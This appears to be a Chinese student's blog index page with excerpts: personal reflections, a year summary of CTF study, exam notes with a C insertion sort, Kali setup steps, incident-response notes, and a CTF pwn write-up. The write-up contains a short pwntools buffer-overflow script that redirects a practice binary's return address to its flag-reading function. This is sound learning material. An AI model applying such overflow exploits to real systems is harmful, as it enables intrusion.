kiki1e

记录错题

在电脑前枯坐半小时后，删掉了写下的所有文字。 6.24晚停笔之余看向窗外，窗边树影摇晃，蝉鸣轻响，夏日时分迹不住的闲散有步履不止的行人，白炽灯散下熹微白光，点缀着路上的坑洼一轮孤月升悬，与群山相氤氲，飘飘撒撒在生活中 景色很美可我好像已经很久没有留意了时间不停的走，淹没了所有平静与安宁莫名想起之前看到过的句子————“于是我摊开手 允许一切流走” 很羡慕这种态度，足够坦然到接受所有发生 当时写这篇博客的心情已经记不清了，也忘记了具体写下的内容夜晚总是易使人情绪化，升起数不尽的念头这篇博客叫nian，很符合题目，零碎的不像一篇完整的文章就像我常常感到自己语言的贫乏

好久没写啦，趁着一轮数据结构过完并未遗忘多少的时候开一篇，计划在一周之内总结完。其实我挺不适合一遍学习一遍记录的，所以之后的几本书也会在过完一遍后再去写笔记，分不清知识点主次倒不是重要原因，主要还是不愿意在专注的时候有太多的打扰哈哈。 希望自己可以真正找到迷途的光

写年度总结的打算其实在几天前就有了，那时刚好是我20岁的生日，就像在开始搭建我的博客写下的随笔，能够把自己在一年中，在十几岁到二十几岁这段经历中，将自己心中所想记录下来。可无奈一直提不起笔，文字于我而言总是沉重的，加之我平日也没有记录的习惯，而混沌的写下这篇总结不是我所希望的，于是我选择将此事搁浅一段时间，仔细感受未变的人生中某些微妙而关键的变化。便一直推延到了现在。 生活：与SeveteR一起出过几次门，涉及到了安徽，山东和江苏，去往了彼此的大学，也前往过其他城市散心。我内心还是很感谢SeveteR师傅的，很幸运有这位朋友，能够一起长大，到现在依旧保持频繁联络。也约过许多饭局，与在我学校所处城市游玩的高中同学，毕业季协会的ctfer，参加线下赛事时其他学校的师傅们，不过更多的是与大学期间相识的朋友，八个人基本逛遍了学校周边的餐饮店。 成长：关于pwn：寒假中陆续整理了一些之前学过的内容，在此基础上查漏补缺，从栈到堆，也学习了一些内核，rust，v8下的pwn，大概什么都了解一些，不过不影响还是赛事爆零，依旧是一个pwn废物。 关于赛事：ctf的赛事在2024的占比很大，最忙的时候基本 ...

软考中级软件设计师备考笔记 插入排序直接插入排序元素集合越接近有序，直接插入排序算法的时间效率越高时间复杂度：O(N^2)空间复杂度：O(1)稳定性：稳定c语言版： #include <stdio.h> #include <assert.h> void InsertSort(int arr[], int n) { assert(arr); // 检查 arr 是否为 NULL int i = 0; for(i = 0; i < n - 1; i++) { int end = i; int x = arr[end + 1];//这里定义了一个变量x，用来存储当前要插入的元素 while(end >= 0) { if(arr[end] > x) { ...

记一次有意思的题解checksec一下，32位程序，保护措施只开了NX拖进ida打开，gets函数存在溢出存在后门函数，直接打开了flag.txt，读取到了flag的内容所以最开始思路是利用溢出将返回地址填充为get_flag的地址，这里溢出是0x38，初步撰写exp这里我是在文件夹下建立了一个名为flag.txt的文件，里面内容是kiki1ebkfd脚本如下 from pwn import * io = process('./get_started_3dsctf_2016') context.log_level = 'debug' payload = b'a'*56 payload += p32(0x080489B8) io.sendline(payload) io.recv() 可以看到在本地的话，是成功打通了但是远程打不通，问题就在于，当调用get_flag函数的时候，程序并不会正常退出，而异常退出的话，最后便没有回显。所以这道题应设法使得程序正常退出。继续看程序，发现存 ...

配置环境下载过慢解决1，加速器：watt toolkit点击左上角的火狐浏览器，输入https://steampp.net/ ，进入watt官网点击gitee下载下载linux版下载完成之后点击右上角打开文件，解压解压完成后压缩包可以删了，终端打开命令如下： ┌──(kali㉿kali)-[~] └─$ ls Desktop Documents Downloads Music Pictures Public Templates Videos ┌──(kali㉿kali)-[~] └─$ cd Downloads ┌──(kali㉿kali)-[~/Downloads] └─$ ls ' ...

没想到进行到这了，开个头哈哈，纪念一下，以后有时间再写。没填的坑越来越多了，马上就大三了……总是感觉时间不够用，但却并未怎么影响我一直在虚度光阴努力着，无为着，继续

初：应急流程：事件类型： 应用安全：webshell，网页篡改，网页挂马…… 系统安全：勒索病毒，挖矿木马，远程后门…… 网络安全：DDOS攻击，ARP攻击，流量劫持…… 数据安全：损坏、加密…… 应急响应模型： 准备阶段： 应用团队建设 应急方案制定 渗透测试评估 安全基线检查 检测阶段： 判断事件类型 判断事件级别 绑定应急方案 抑制阶段：（限制攻击/破坏波及的范围，同时也是在降低潜在的损失） 阻断：IP地址、网络连接、危险主机…… 关闭：可疑进程、可疑服务…… 删除：违规账号、危险文件…… 根除阶段：（通过事件分析出根源并彻底根除、以免被再次利用） 增强：安全策略、全网监控…… 修复：应用漏洞、系统漏洞、补丁更新…… 还原：操作系统、业务系统…… 恢复阶段：(把被破坏的信息彻底还原到正常运作的状态) 恢复业务系统 恢复用户数据 恢复网络通信 总结：（回顾并整合应急响应过程的相关信息、进行事后分析总结和修订安全计划、政策、程序、并进行训练、以防止入侵的再次发生） 事件会议总结 响应报告输出 响应工作优化 网页挂马phpstudy查找注 ...